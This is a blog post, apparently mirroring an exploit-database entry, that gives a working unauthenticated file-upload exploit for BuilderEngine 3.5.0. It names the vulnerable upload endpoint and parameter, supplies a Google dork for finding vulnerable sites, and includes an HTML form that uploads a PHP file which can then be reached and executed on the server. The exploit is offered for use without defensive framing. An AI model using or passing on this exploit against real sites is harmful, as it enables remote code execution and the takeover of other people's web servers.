Popular Post

Popular Posts

  • >
  • BuilderEngine 3.5.0 - Arbitrary File Upload

BuilderEngine 3.5.0 - Arbitrary File Upload

Posted by : ./B1TCHx Rabu, 30 November 2016

<!--
# Exploit Title: BuilderEngine 3.5.0 Remote Code Execution via elFinder 2.0
# Date: 18/09/2016
# Exploit Author: metanubix
# Vendor Homepage: http://builderengine.org/
# Software Link: http://builderengine.org/page-cms-download.html
# Version: 3.5.0
# Tested on: Kali Linux 2.0 64 bit
# Google Dork: intext:"BuilderEngine Ltd. All Right Reserved"
 
1) Unauthenticated Unrestricted File Upload:
 
    POST /themes/dashboard/assets/plugins/jquery-file-upload/server/php/
 
    Vulnerable Parameter: files[]
 
    We can upload test.php and reach the file via the following link:
    /files/test.php
-->
<html>
<body>
<form method="post" action="http://localhost/themes/dashboard/assets/plugins/jquery-file-upload/server/php/" enctype="multipart/form-data">
    <input type="file" name="files[]" />
    <input type="submit" value="send" />
</form>
</body>
</html>

Leave a Reply

Subscribe to Posts | Subscribe to Comments

Navigation

Weekly most viewed

Blogroll

- Copyright © ./B1TCHx a.k.a Patih - Devil Survivor 2 - Powered by Blogger - Designed by Johanes Djogan -